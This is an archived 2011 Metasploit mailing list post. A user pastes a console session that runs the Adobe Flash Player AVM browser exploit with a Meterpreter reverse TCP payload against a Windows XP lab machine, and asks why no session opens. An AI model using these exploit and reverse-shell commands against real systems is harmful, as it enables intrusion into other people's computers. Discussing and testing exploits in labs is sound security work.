Metasploit mailing list archives

Re: svn checkout


From: benny_reichelt <benny_reichelt () yahoo com>
Date: Wed, 06 Apr 2011 00:50:37 +0200

Hello, doing like this:


use exploit/windows/browser/adobe_flashplayer_avm
msf exploit(adobe_flashplayer_avm) > set SRVPORT 8080
SRVPORT => 8080
msf exploit(adobe_flashplayer_avm) > set SSL 0
SSL => 0
msf exploit(adobe_flashplayer_avm) > set PAYLOAD
windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_flashplayer_avm) > set SRVHOST 192.168.178.118
SRVHOST => 192.168.178.118
msf exploit(adobe_flashplayer_avm) > exploit -j


[*] Exploit running as background job.
msf exploit(adobe_flashplayer_avm) >
[*] Started reverse handler on 192.168.178.116:4444
[*] Using URL: http://192.168.178.116:8080/03m6YwjSFJGlFPE
[*] Server started.
[*] Sending Adobe Flash Player AVM Bytecode Verification Vulnerability
HTML to 192.168.178.117:1554
[*] Sending Exploit SWF

... and rest is missing. using a mozilla firefox 3.6, flash version:
10.1.102.64 ,winxp, no firewall, no anti virus on guest machine.
Answer is sent by server, but no session.
Flash is restarting on guest after sending exploit...

thx, hope for help
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: